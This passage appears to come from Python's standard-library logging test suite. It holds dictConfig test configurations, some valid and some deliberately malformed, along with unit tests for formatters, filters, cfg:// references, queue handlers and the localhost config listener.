class CustomHandler(logging.StreamHandler):
pass
class CustomListener(logging.handlers.QueueListener):
pass
class CustomQueue(queue.Queue):
pass
def queueMaker():
return queue.Queue()
def listenerMaker(arg1, arg2, respect_handler_level=False):
def func(queue, *handlers, **kwargs):
kwargs.setdefault('respect_handler_level', respect_handler_level)
return CustomListener(queue, *handlers, **kwargs)
return func
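# Sketch of how the factories above are referenced from a dictConfig
# dictionary (illustrative only; the configs inside ConfigDictTest below are
# the real exercises).  A '()' key names a callable - here the module-level
# formatFunc - and the remaining keys are passed to it as keyword arguments;
# logging.config.dictConfig(_example_factory_config) would build the
# formatter by calling formatFunc(format=...).
_example_factory_config = {
    'version': 1,
    'formatters': {
        'viafactory': {
            '()': formatFunc,
            'format': '%(levelname)s:%(message)s',
        },
    },
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'formatter': 'viafactory',
        },
    },
    'root': {'handlers': ['console']},
}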
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
bad_format = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
config_queue_handler = {
'version': 1,
'handlers' : {
'h1' : {
'class': 'logging.FileHandler',
},
# the 'ah' key sorts before 'h1', the handler it depends on, to test that deferred config works
'ah' : {
'class': 'logging.handlers.QueueHandler',
'handlers': ['h1']
},
},
"root": {
"level": "DEBUG",
"handlers": ["ah"]
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def check_handler(self, name, cls):
h = logging.getHandlerByName(name)
self.assertIsInstance(h, cls)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
self.check_handler('hand1', logging.StreamHandler)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
self.check_handler('hand1', CustomHandler)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config7_ok, but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
with self.check_no_resource_warning():
fn = make_temp_file(".log", "test_logging-X-")
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn,
"encoding": "utf-8",
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(closeFileHandler, handler, fn)
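    # Helper for the listen() tests below: starts logging.config.listen() on an
    # ephemeral port (port 0), connects to it and sends the configuration as a
    # 4-byte big-endian length prefix (struct.pack('>L', len(text))) followed by
    # the UTF-8 encoded text, then stops the listener and joins its thread.
    # An optional 'verify' callable is passed straight through to listen().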
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
threading_helper.join_thread(t)
@support.requires_working_socket()
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@support.requires_working_socket()
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@support.requires_working_socket()
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_bad_format(self):
self.assertRaises(ValueError, self.apply_config, self.bad_format)
def test_bad_format_with_dollar_style(self):
config = copy.deepcopy(self.bad_format)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
self.assertEqual(sorted(logging.getHandlerNames()),
['bufferGlobal', 'fileGlobal'])
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raised as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
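    # BaseConfigurator.convert() resolves 'cfg://' references against the
    # configuration dict, supporting both attribute-style and indexed access,
    # e.g. 'cfg://adict.d' -> 'e' and 'cfg://nest1[1][0]' -> 'h'.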
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
def test_config_callable_filter_works(self):
def filter_(_):
return 1
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_works(self):
filter_ = logging.Filter("spam.eggs")
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_method_works(self):
class FakeFilter:
def filter(self, _):
return 1
filter_ = FakeFilter()
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_invalid_type_raises(self):
class NotAFilter: pass
for filter_ in [None, 1, NotAFilter()]:
self.assertRaises(
ValueError,
self.apply_config,
{"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}}
)
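    # Helper for test_config_queue_handler: copies config_queue_handler, points
    # the file handler at a temporary file, optionally overrides the 'queue' and
    # 'listener' keys of the 'ah' handler, applies the config, and checks that
    # records logged on the root logger reach the file via the queue listener.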
def do_queuehandler_configuration(self, qspec, lspec):
cd = copy.deepcopy(self.config_queue_handler)
fn = make_temp_file('.log', 'test_logging-cqh-')
cd['handlers']['h1']['filename'] = fn
if qspec is not None:
cd['handlers']['ah']['queue'] = qspec
if lspec is not None:
cd['handlers']['ah']['listener'] = lspec
qh = None
delay = 0.01
try:
self.apply_config(cd)
qh = logging.getHandlerByName('ah')
self.assertEqual(sorted(logging.getHandlerNames()), ['ah', 'h1'])
self.assertIsNotNone(qh.listener)
qh.listener.start()
logging.debug('foo')
logging.info('bar')
logging.warning('baz')
# Need to let the listener thread finish its work
deadline = time.monotonic() + support.LONG_TIMEOUT
while not qh.listener.queue.empty():
time.sleep(delay)
if time.monotonic() > deadline:
self.fail("queue not empty")
with open(fn, encoding='utf-8') as f:
data = f.read().splitlines()
self.assertEqual(data, ['foo', 'bar', 'baz'])
finally:
if qh:
qh.listener.stop()
h = logging.getHandlerByName('h1')
if h:
self.addCleanup(closeFileHandler, h, fn)
else:
self.addCleanup(os.remove, fn)
@threading_helper.requires_working_threading()
def test_config_queue_handler(self):
q = CustomQueue()
dq = {
'()': __name__ + '.CustomQueue',
'maxsize': 10
}
dl = {
'()': __name__ + '.listenerMaker',
'arg1': None,
'arg2': None,
'respect_handler_level': True
}
qvalues = (None, __name__ + '.queueMaker', __name__ + '.CustomQueue', dq, q)
lvalues = (None, __name__ + '.CustomListener', dl, CustomListener)
